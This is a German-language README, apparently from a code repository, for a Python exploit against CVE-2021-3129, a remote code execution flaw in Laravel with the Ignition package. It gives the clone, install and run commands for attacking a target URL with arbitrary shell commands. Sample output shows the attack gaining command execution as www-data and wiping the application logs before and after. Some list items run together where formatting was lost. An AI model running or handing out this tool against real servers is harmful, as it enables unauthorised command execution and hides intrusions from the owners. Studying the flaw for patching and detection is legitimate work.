
Python-Exploit für CVE-2021-3129, das die PHAR-Deserialisierung automatisiert, um beliebige Befehle auf verwundbaren Laravel-Ignition-Endpunkten auszuführen.
Dies ist ein Python-Exploit-Skript für CVE-2021-3129, eine Remote-Code-Ausführungsschwachstelle in Laravel, wenn das Ignition-Paket installiert ist. Diese Schwachstelle ermöglicht es einem Angreifer, beliebige Systembefehle mittels PHAR-Deserialisierung auszuführen.
phpggcid, whoami, usw.)requests-BibliothekKlonen Sie das Repository:
git clone https://github.com/0x0d3ad/CVE-2021-3129.git
cd CVE-2021-3129
Installieren Sie die erforderlichen Python-Pakete:
pip install requests
Führen Sie das Skript mit dem gewünschten Ziel und Befehl aus:
python3 CVE-2021-3129.py http://example.com --cmd 'id'
Beispielausgabe:
[+] Generating PHAR payload for command: id
[+] Trying to clear logs
[+] Logs cleared
[+] Convert log file to PHAR
[+] Successfully converted logs to PHAR
[+] PHAR deserialized
---------------------------------------
uid=33(www-data) gid=33(www-data) groups=33(www-data)
---------------------------------------
[+] Trying to clear logs
[+] Logs cleared
target (erforderlich): Die URL der anfälligen Laravel-Anwendung.--cmd (optional): Der Befehl, der auf dem Ziel ausgeführt werden soll (Standard: whoami).--log_path (optional): Der zu verwendende Log-Dateipfad (Standard: ../storage/logs/laravel.log).
